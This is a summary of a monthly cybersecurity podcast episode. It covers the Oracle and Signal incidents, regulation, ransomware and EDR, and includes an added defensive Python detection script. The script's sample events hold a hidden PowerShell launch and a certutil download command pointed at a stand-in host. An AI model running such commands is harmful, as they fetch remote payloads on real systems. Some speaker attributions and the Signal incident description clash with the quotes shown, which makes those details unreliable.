Cybersecurity Today: Month-End Review Summary
Release Date: April 5, 2025
Host: Jim Love
Guests: Dana Proctor (Ottawa), Randy Rose (Center for Internet Security, Saratoga Springs), David Shipley (Fredericton)
1. Introduction
In the April 5, 2025 episode of Cybersecurity Today, host Jim Love convenes a panel comprising Dana Proctor from Ottawa, Randy Rose from the Center for Internet Security in Saratoga Springs, and the ever-present David Shipley from Fredericton. The discussion focuses on major cybersecurity events of the month, evaluating breaches, communication mishaps, and evolving global regulations.
2. Oracle Breach: A Case Study in Poor Incident Communication
David Shipley initiates the conversation with a critique of Oracle’s handling of a recent security breach:
[01:33] David Shipley: "Breaches happen even to the big kids. It's important to be honest when it happens because the speculation, the rumor mill, The Register, savage headlines on the Reg, they're just not worth dancing around."
Incident Overview: A hacking group claimed to have breached Oracle Cloud Classic, not the primary Oracle Cloud service. Initially, Oracle denied the breach, but contradictions arose when the hackers demonstrated their access by placing messages on Oracle servers.
Discussion Highlights:
- Transparency Failure: Randy Rose emphasizes the critical role of communication during breaches.
[04:11] Jim Love: "But in cybersecurity, if you're not candid, you're gonna have more pain in the long run than you do by just putting this out."
- Broader Implications: Dana Proctor underscores the long-term damage to Oracle's trustworthiness due to mishandled communications.
[09:09] Dana Proctor: "Breaches do have a way of bringing our businesses, if not our future trajectory down significantly."
- Rebuilding Trust: David Shipley notes that while breaches can be detrimental, organizations like CrowdStrike have successfully rebuilt trust post-incident by transparently addressing issues.
[09:41] David Shipley: "You can actually rebuild trust through an incident. It's not ideal, but you can."
3. Signal Group Chat Incident: Government’s Security Oversight
Jim Love transitions to discussing a notable security lapse involving Signal, an encrypted messaging app widely trusted for secure communications.
Incident Overview: Several U.S. Government officials used Signal for sensitive communications, believing it to be fully secure. However, vulnerabilities were exploited, allowing unauthorized parties to access conversations.
Key Points Discussed:
- Misplaced Trust in Technology: David Shipley criticizes the assumption that using encrypted apps like Signal inherently ensures security.
[10:13] Jim Love: "You have encrypted communication there. Only you got to make sure you don't invite the wrong people to that..."
- Government Policy Failures: Randy Rose explains the complexities of data classification and the importance of adhering to need-to-know principles even when using secure channels.
[16:14] Randy Rose: "When you move something out of official IT channels, you've lost control over who can get that."
- Cultural Norms and Leadership: The panel emphasizes that technological solutions alone are insufficient; organizational culture and leadership commitment are paramount.
[19:27] Randy Rose: "When there's a breach, understand what it is, what's going on, who's impacted, how do we resolve that issue."
- Consequences and Accountability: Dana Proctor expresses frustration over the lack of accountability and the excuses provided by officials regarding the breach.
[17:41] Dana Proctor: "Them telling me that it was okay that this journalist was in that chat was just an offense on my intelligence."
4. Global Cybersecurity Regulations: UK’s Progressive Steps vs. Canada’s Struggles
The conversation shifts to global cybersecurity regulatory environments, particularly contrasting the United Kingdom’s proactive measures with Canada’s lagging efforts.
UK’s Legislative Advances: David Shipley highlights the UK's introduction of new legislation targeting data centers and Managed Service Providers (MSPs), recognizing these entities as critical to the digital economy.
[20:03] David Shipley: "The UK government take a really nice leadership role globally in new legislation being proposed to actually extend critical infrastructure cybersecurity."
Challenges in Canada: Dana Proctor laments Canada's delayed and insufficient regulatory framework, despite significant investments in certification programs.
[23:04] Dana Proctor: "But we still can't get regulations or bills through to say what our telecommunications or our nuclear power plants should be required to do."
Role of MSPs: Randy Rose elaborates on the importance of regulating MSPs, which often serve small organizations lacking robust internal cybersecurity measures.
[24:58] Randy Rose: "Having regulations that support those organizations is one of the best ways to get to those organizations that are traditionally really hard to get to."
Historical Context: The panel reflects on previous initiatives like Canada's version of Cyber Essentials, noting its failure due to lack of enforcement compared to the UK's success where government RFPs mandated compliance.
[28:42] David Shipley: "Cyber Essentials was more successful in the UK because you couldn't get a government RFP if you didn't have the basic bare minimum."
5. Recent Cybersecurity Incidents: Kuala Lumpur Airport and NHS Scotland
Kuala Lumpur International Airport Ransomware Attack: Dana Proctor discusses a $10 million ransomware attack on the airport, focusing on the convergence of Operational Technology (OT) with Information Technology (IT), which exposed critical flight information systems.
[39:25] Dana Proctor: "They had whiteboards in the Kuala Lumpur International Airport... targeting what used to be physically separate fiber networks into the same network."
NHS Scotland Ransomware Attack: The panel examines a severe ransomware incident that crippled most clinical systems, forcing staff to revert to pen and paper operations for over a day without effective incident response plans.
[40:06] Dana Proctor: "Patient care wasn't able to go on... no segmentation for offsite backups... they had no incident response plan."
Implications: These incidents illustrate the devastating impact of ransomware on critical infrastructure and the urgent need for robust cybersecurity measures and preparedness.
6. EDR Bypass and Endpoint Security Challenges
Jim Love introduces a discussion on the sophistication of recent Endpoint Detection and Response (EDR) bypass techniques, highlighting their threat to small businesses.
Technical Insights: Randy Rose explains that while EDR systems are essential, their effectiveness is contingent on proper tuning and configuration to detect novel attack vectors like “living off the land” binaries.
[36:26] Randy Rose: "EDR isn't brand new, but some of the techniques that we're seeing are pretty novel and interesting."
Panel Concerns: Dana Proctor and David Shipley emphasize that many organizations treat EDR as a “set and forget” solution, neglecting continuous monitoring and testing, which diminishes their efficacy.
[37:47] Dana Proctor: "We need to be testing, we need to be actually running some semblance of penetration testing..."
[37:59] David Shipley: "When we hear vendors say that sweet siren song of it's automated, smart, intelligent, you don't have to do anything, it is the disaster of the sirens."
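To make the panel's tuning point concrete, here is an added illustration of the kind of rule pass an EDR runs over process-creation telemetry. It is not code from the podcast, from the Center for Internet Security, or from any EDR product; the events, rule names, severities and the allowlist pair are all constructed for the example. The same sample is run once untuned and once with a fleet-specific allowlist, showing how a broad rule produces noise until someone tunes it, while the high-confidence rules (an Office application spawning a script host, certutil.exe used to fetch content) are never suppressed.

```python
"""Toy EDR-style detection pass over constructed process-creation events.

Added example, not from the podcast or the Center for Internet Security.
Events, rule names, severities and the allowlist are constructed for
illustration; the shape mimics what a sensor or Sysmon-style collector emits.
"""
import json

# Process images that can execute attacker-supplied scripts (defender watch-list).
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Office applications that should rarely be the parent of a script host.
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}

# Constructed telemetry: one JSON record per line. Hosts, users and the URL are made up.
SAMPLE_EVENTS = """
{"host":"ws01","parent":"explorer.exe","image":"winword.exe","cmd":"winword.exe report.docx","user":"alice"}
{"host":"ws01","parent":"winword.exe","image":"powershell.exe","cmd":"powershell.exe -w hidden -c <constructed>","user":"alice"}
{"host":"ws02","parent":"services.exe","image":"svchost.exe","cmd":"svchost.exe -k netsvcs","user":"SYSTEM"}
{"host":"ws02","parent":"cmd.exe","image":"certutil.exe","cmd":"certutil.exe -urlcache -f http://example.invalid/update.txt update.txt","user":"bob"}
{"host":"ws03","parent":"explorer.exe","image":"notepad.exe","cmd":"notepad.exe todo.txt","user":"carol"}
{"host":"ws04","parent":"explorer.exe","image":"powershell.exe","cmd":"powershell.exe -File Get-Inventory.ps1","user":"it-admin"}
"""


def parse_events(text):
    """Parse one JSON object per non-empty line into a list of dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def rule_office_spawns_script_host(ev):
    """High confidence: a document viewer launching a script interpreter."""
    if ev["parent"].lower() in OFFICE_APPS and ev["image"].lower() in SCRIPT_HOSTS:
        return "high"
    return None


def rule_certutil_download(ev):
    """High confidence: a signed OS binary (certutil) used with its URL-cache flag to fetch content."""
    if ev["image"].lower() == "certutil.exe" and "-urlcache" in ev["cmd"].lower():
        return "high"
    return None


def rule_any_script_host(ev):
    """Broad, noisy rule: every script-host launch. Useless until tuned against the fleet's baseline."""
    return "low" if ev["image"].lower() in SCRIPT_HOSTS else None


RULES = [rule_office_spawns_script_host, rule_certutil_download, rule_any_script_host]


def detect(events, allowlist=frozenset()):
    """Run every rule over every event and return the alerts.

    allowlist holds (user, parent_image) pairs that a tuning pass has confirmed
    benign for this fleet. Low-severity hits on those pairs are suppressed;
    high-severity hits are never suppressed.
    """
    alerts = []
    for ev in events:
        for rule in RULES:
            severity = rule(ev)
            if severity is None:
                continue
            if severity == "low" and (ev["user"], ev["parent"].lower()) in allowlist:
                continue
            alerts.append({"rule": rule.__name__, "severity": severity,
                           "host": ev["host"], "user": ev["user"], "cmd": ev["cmd"]})
    return alerts


def severity_counts(alerts):
    """Summarise alerts by severity, e.g. {'high': 2, 'low': 1}."""
    counts = {"high": 0, "low": 0}
    for alert in alerts:
        counts[alert["severity"]] += 1
    return counts


if __name__ == "__main__":
    events = parse_events(SAMPLE_EVENTS)
    print("untuned:", severity_counts(detect(events)))
    # Tuning: the IT admin's interactive PowerShell use from Explorer is expected on this fleet.
    tuned = detect(events, allowlist={("it-admin", "explorer.exe")})
    print("tuned:  ", severity_counts(tuned))
    for alert in tuned:
        print(f"[{alert['severity']}] {alert['rule']} on {alert['host']} ({alert['user']}): {alert['cmd']}")
```

The untuned pass produces four alerts (two high, two low); the tuned pass drops the admin's expected PowerShell launch and keeps the three that matter. The allowlist is deliberately keyed on user and parent rather than on the image alone, so tuning out one known-benign pattern does not blind the rule to the same binary launched from an unexpected parent.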
7. Law Enforcement and Cybercrime: Arrest of a Canadian Hacker
The panel touches on the recent arrest of a Canadian individual implicated in hacking the Texas GOP, highlighting the challenges and successes in international cyber law enforcement.
[44:19] Dana Proctor: "One of the best environmental campaigns ever. But also, do not taunt the FBI with foul language and tell them what they can and can't do."
Discussion Points:
- Jurisdictional Challenges: Randy Rose notes the difficulties in international law enforcement coordination, though this particular arrest marks a victory.
[45:13] Jim Love: "I keep looking at this... it's incredibly hard to get through the communications people from police who will actually talk to you."
- Deterrence: The panel agrees that persistent efforts by authorities like the FBI serve as a deterrent against cybercriminal activities.
8. Positive Developments: Integrating Anti-Money Laundering with Cybersecurity
Dana Proctor highlights the integration of Anti-Money Laundering (AML) initiatives with cybersecurity frameworks, fostering more robust detection and prevention mechanisms against financial cybercrimes.
[46:23] Dana Proctor: "Anti money laundering, anti fraud, cybersecurity, they're all very close cousins."
Benefits: Such integration enhances the ability to detect and thwart illicit financial activities, particularly those targeting vulnerable populations like seniors and individuals with disabilities.
9. Conclusion and Reflections
Jim Love wraps up the episode by reflecting on the rapid passage of time during the discussion and expressing gratitude to the panelists for their insightful contributions. He encourages listeners to engage via email or LinkedIn for further discussions on cybersecurity topics.
[47:23] Jim Love: "Thank you very much and thanks for listening... we'll do this again next month."
Key Takeaways
- Transparency and Honesty: Effective communication during breaches can mitigate long-term damage to an organization’s reputation.
- Regulatory Enforcement: Strong, enforced regulations, as exemplified by the UK, are crucial in enhancing cybersecurity across all sectors.
- Continuous Vigilance: EDR systems require regular tuning and testing to remain effective against evolving cyber threats.
- Law Enforcement Collaboration: International cooperation is essential in combating cybercrime, with recent arrests highlighting progress.
- Integrated Approaches: Combining AML with cybersecurity efforts strengthens overall defense mechanisms against financial cyber threats.
For more detailed discussions and updates, subscribe to Cybersecurity Today and follow Jim Love on LinkedIn.
